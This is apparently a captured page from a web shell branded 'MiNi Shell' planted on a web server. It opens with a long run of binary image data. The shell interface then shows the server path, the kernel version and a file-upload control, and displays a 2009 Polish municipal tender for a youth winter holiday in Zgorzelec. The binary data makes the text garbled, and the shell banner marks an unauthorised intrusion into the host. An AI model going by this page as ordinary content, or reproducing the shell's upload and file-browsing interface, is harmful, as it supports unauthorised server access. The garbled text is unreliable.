JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090109/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090109/2634-N-2009.html

<p class="kh_header"><b>Zgorzelec: Organizacja wypoczynku zimowego dla młodzieży z Avion /Francja/ oraz ze Zgorzelca</b><br>
<b>Numer ogłoszenia: 2634 - 2009; data zamieszczenia: 09.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja wypoczynku zimowego dla młodzieży z Avion /Francja/ oraz ze Zgorzelca.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest organizacja dla 77 osób wypoczynku zimowego                      w górach (woj. dolnośląskie)  dla młodzieży gimnazjalnej z Avion /Francja/ oraz ze Zgorzelca.

2.	Realizacja przedmiotu zamówienia nastąpi poprzez zorganizowanie przez Wykonawcę jednego turnusu, z uwzględnieniem poniższych terminów oraz ilości uczestników: 


a.	od dnia 22 lutego 2009 r. do 26 lutego 2009 r. - 42 osoby, w tym 5 opiekunów oraz 1 kierowca (gimnazjaliści z Francji),

b.	od dnia 26 lutego 2009 r. do 3 marca 2009 r. - 77 osób, w tym 9 opiekunów oraz 2 kierowców (gimnazjaliści z Francji oraz ze Zgorzelca).

3.	Realizacja przedmiotu zamówienia nastąpi z uwzględnieniem niniejszych postanowień:
            
            3.1 Zakwaterowanie:

1.	W ośrodku wypoczynkowym - zatwierdzonym przez Kuratorium Oświaty jako placówka wypoczynku dzieci i młodzieży - zgodnie z przepisami MEN,  (Zamawiający zastrzega sobie, iż nie może to być budynek szkolny lub hala sportowa).
2.	Ośrodek ogrodzony, usytuowany w odległości nie większej niż 300 m od wyciągu narciarskiego.
3.	Na terenie ośrodka wypoczynkowego powinny znajdować się:
a.	sala telewizyjna, wyposażona w TV, video lub DVD,
b.	sala dyskotekowa ze sprzętem dyskotekowym,
c.	telefon na kartę magnetyczną - ogólnie  dostępny,
d.	świetlica, pomieszczenie odrębne od stołówki(wyposażona w gry planszowe i zręcznościowe, książki itp.),
e.	stoły do tenisa stołowego, piłkarzyki, stół bilardowy,
f.	krąg ogniskowy z ławeczkami do siedzenia.

4.	Uczestnicy powinni być zakwaterowani w jednym budynku /murowanym/,               w pokojach 2 - 4  osobowych z pełnym węzłem sanitarnym (umywalka, wc, prysznic).

3.2	Wyżywienie

1.	Wyżywienie obejmujące 4 posiłki dziennie tj.: śniadanie, obiad składający się              z dwóch dań, podwieczorek i kolację. 
2.	Dostępne przez całą dobę na korytarzu przed stołówką: woda mineralna oraz ciepła herbata.
3.	Stołówka i kuchnia winny znajdować się na terenie ośrodka i powinny zmieścić całą grupę w jednej turze.
4.	Turnus rozpoczyna się śniadaniem w pierwszym dniu pobytu i kończy obiadem
 w ostatnim  dniu pobytu. Wykonawca zobowiązuje się zapewnić grupie                     z Avion suchy prowiant  oraz napoje  na drogę powrotną.


3.3	Opieka medyczna

1.	Wykonawca zobowiązany będzie do zagwarantowania uczestnikom wypoczynku  stałej opieki medycznej - pielęgniarka na terenie ośrodka, lekarz na wezwanie personelu. 
2.	Wykonawca zobowiązany będzie do zagwarantowania podstawowych lekarstw na własny koszt,  p. środki opatrunkowe, przeciwbólowe itp. 

3.4 Kadra pedagogiczna

1.	Zamawiający we własnym zakresie zapewnia kadrę pedagogiczną.                    

3.5 Transport i program rekreacyjno-sportowy

1.	Transport  autokarowy zabezpiecza Zamawiający w obie strony.
2.	Wykonawca w ramach kosztów zapewnia parking dla dwóch autokarów -                z uwzględnieniem pkt. 3.2 ppkt a i b SIWZ.
3.	Program rekreacyjno-sportowy zapewnia Zamawiający.

      
                 3.6 Ubezpieczenie

1.	Ubezpieczenie uczestników wypoczynku zimowego od następstw nieszczęśliwych wypadków na okres  trwania zimowiska ponosi Wykonawca.
2.	Potwierdzenie ubezpieczenia Wykonawca ma obowiązek dostarczyć do siedziby Zamawiającego w terminie do 3 dni przed rozpoczęciem  turnusu.
3.	Ubezpieczenie dotyczące przejazdu, wycieczek pokrywa Zamawiający.
              

4.	Wykonawca zobowiązany jest dołączyć do oferty zdjęcia (fotografie w formie papierowej) bądź foldery przedstawiające miejsce i warunki wypoczynku zimowego - pokoi, łazienek, świetlicy, stołówki, obiektu oraz jego otoczenia.

5.	Zamawiający zastrzega sobie prawo dokonania wizji lokalnej miejsc zaproponowanych przez Wykonawców jako miejsc zakwaterowania uczestników wypoczynku zimowego przed wyborem najkorzystniejszej oferty..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 03.03.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Wykonawca wniesie wadium w wysokości 990,00 zł przed upływem terminu  składania ofert, który został określony w pkt. 16.1 SIWZ.

2.	W zależności od woli wykonawcy wadium może być wnoszone w formach:

1.	pieniądzu (przelew na rachunek bankowy wskazany przez zamawiającego),
2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
3.	gwarancjach bankowych,
4.	gwarancjach ubezpieczeniowych,
5.	poręczeniach udzielanych przez podmioty, o których mowa w art.. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.)

3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego Nr 35124012971111000025654013 w banku PeKaO S.A. I O/Zgorzelec.
             Potwierdzeniem tej formy wniesienia wadium będzie kopia przelewu (wpłaty)  
             załączona do oferty z dopiskiem Wadium do postępowania nr WZP.341-88/08.
		
4.	Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą wadium zostanie wykluczony z postępowania o udzielenie zamówienia, a jego oferta zostanie odrzucona zgodnie z art. 24 ust. 2 pkt 4 ustawy Prawo zamówień publicznych.

5.	Zamawiający zwróci niezwłocznie wadium, jeżeli:
1.	upłynął termin związania ofertą,

2.	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie  należytego wykonania tej umowy,

3.	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.

6.	Z zastrzeżeniem pkt. 6 a, Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy:
1.	który wycofał ofertę przed upływem terminu składania ofert,

2.	który został wykluczony z postępowania,

3.	którego oferta została odrzucona.

6 a   Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

7.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
8.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,

2.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,

3.	Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

4.	w przypadku określonym w pkt. 6 a 


9.	W przypadku wniesienia wadium w formach innych niż wymienione w pkt. 2 ppkt od 2 do 5 z treści dokumentu musi jednoznacznie wynikać, iż wypłata Zamawiającemu sumy gwarancyjnej nastąpi także w przypadku określonym w pkt. 6 a .<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie Zamówienia mogą  ubiegać się Wykonawcy spełniający warunki określone             w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, czyli:

1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli	ustawy nakładają obowiązek posiadania takich uprawnień.
                
            Ocena spełnienia tego warunku odbędzie się na podstawie analizy treści:

a.	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia                    o wpisie do ewidencji działalności  gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania  ofert,

b.	aktualnego zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt  4-8  ustawy Pzp, wystawione nie wcześniej niż  6 miesięcy przed terminem składania ofert,

c.	aktualnego zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy Pzp, wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert,


Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 1 a i c  składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio dla pkt. 1 a - że nie otwarto jego likwidacji ani nie ogłoszono upadłości, dla pkt. 1 c - nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
W zakresie dokumentu określonego w pkt. 1 b Wykonawca składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Dokumenty, o których mowa w pkt.1 a i c, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania lub przestawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia określonego  w niniejszym postępowaniu. Zamawiający w tym zakresie żąda następujących dokumentów.:

a.	 wykazu dwóch wykonanych usług, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem  i wartością usług stanowiących przedmiot zamówienia tj. polegających na organizacji wypoczynku dla dzieci i młodzieży w minimum 10 dniowym okresie, z podaniem ich wartości brutto nie mniejszej niż 40.000 zł każda oraz daty i miejsca wykonania z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie - formularz Nr 3 do SIWZ

b.	Wykaz oraz dokument stwierdzający, iż Wykonawca dysponuje lub będzie dysponował ośrodkiem wypoczynkowym niezbędnym do zrealizowania przedmiotu zamówienia - formularz Nr 4 do SIWZ.

c.	w przypadku kiedy wykonawca w wykazie, o którym mowa w pkt. 2 b wskaże ośrodek, którym będzie dysponował - do przedmiotowego wykazu musi załączyć pisemne zobowiązania innych podmiotów do udostępnienia niezbędnego lokalu do zrealizowania  zamówienia.

3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj.                  
a.	 dołączą  polisę, a w przypadku jej braku inny dokument  potwierdzający,
          że wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie 
          prowadzonej działalności gospodarczej.    
                           
4.	Nie podlegają wykluczeniu z postępowania o zamówienie publiczne zgodnie                            z art.24 ust.  1 i   2 ustawy Prawo zamówień publicznych.

5.	Złożą oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie  
           Zamówienia  /oświadczenie zostało określone formularzem Nr 2 do SIWZ/

Zamawiający dokona oceny spełnienia każdego z  warunków na podstawie załączonych do oferty dokumentów, o których mowa w pkt. 10  SIWZ  metodą spełnia /  nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający wymaga złożenia dokumentów potwierdzających spełnianie warunków udziału  w postępowaniu, zgodnie z treścią rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane. W celu:

1.	potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej 
           działalności  lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy  z  dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, zwanej dalej ustawą, zamawiający żąda  następujących dokumentów:

a.	Oryginału lub kopii aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,                  

b.	Zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust. 1  pkt. 4-8 ustawy Pzp, wystawionego nie wcześniej niż na 6 miesięcy przed terminem składania ofert, 

c.	Zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Pzp, wystawionego nie wcześniej niż na 6 miesięcy przed terminem składania ofert,
2.	potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia zamawiający  żąda następujących dokumentów:

a.	Wypełnionego formularza wykazu zrealizowanych/wykonywanych usług zgodnie z zapisem w pkt. 9.2 a SIWZ - formularz Nr 3  do SIWZ,

b.	Wykazu oraz dokumentu, o których mowa w pkt. 9.2 b SIWZ - formularz Nr 4 do SIWZ.

c.	Pisemnego zobowiązania innych podmiotów do udostępnienia ośrodka                   niezbędnego do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 9.2 b SIWZ, wykonawca wskazał, iż  będzie dysponował ośrodkiem wypoczynkowym.

3.	potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej 
       zapewniającej wykonanie zamówienia, zamawiający żąda:

a.	Polisy lub innego dokumentu ubezpieczenia zgodnie z zapisem            
                       w pkt. 9.3 SIWZ.

4.	Oświadczenie Wykonawcy, że posiada niezbędny potencjał finansowy, kadrowy,
      	techniczny oraz doświadczenie niezbędne do realizacji zamówienia oraz, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy Prawo zamówień publicznych złożone na druku stanowiącym formularz nr 2  do SIWZ . 
        W przypadku złożenia oferty wspólnej, dokumenty o których mowa w pkt. 1 od a do c składa każdy  z wykonawców. 

5 A       Wymagania dotyczące oferty

 Do oferty Wykonawca musi złożyć następujące dokumenty, pod rygorem odrzucenia  oferty  zgodnie z art. 89 ust. 1 pkt. 2 , z zastrzeżeniem art. 87 ust. 2 pkt. 3 ustawy PZP:

1)	wypełniony  formularz ofertowy - formularz Nr 1,

2)	wypełniony formularz oświadczenia wskazującego część zamówienia, której wykonawca powierzy podwykonawcom - formularz nr  5  do SIWZ,

3)	informacje na temat wykonawcy (wg zał. wzoru ) - formularz nr 6 do SIWZ

4)	opis obiektu wraz z podaniem adresu zakwaterowania i wyżywienia wraz ze zdjęciami lub folderami, o których mowa w pkt. 3.4 SIWZ

5)	kartę kwalifikacyjną obiektu potwierdzoną przez Kuratorium Oświaty, Sanepid, Służby Straży Pożarnej oraz Urząd Gminy na zimę 2009 r..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Zgorzelcu
59-900 Zgorzelec, ul. Domańskiego 6,pokój nr 6.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.01.2009 godzina 10:00, miejsce: w siedzibie  Zamawiającego tj.:
Punkt Obsługi Interesanta
Urząd Miasta w Zgorzelcu
59-900 Zgorzelec
ul. Domańskiego 7.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com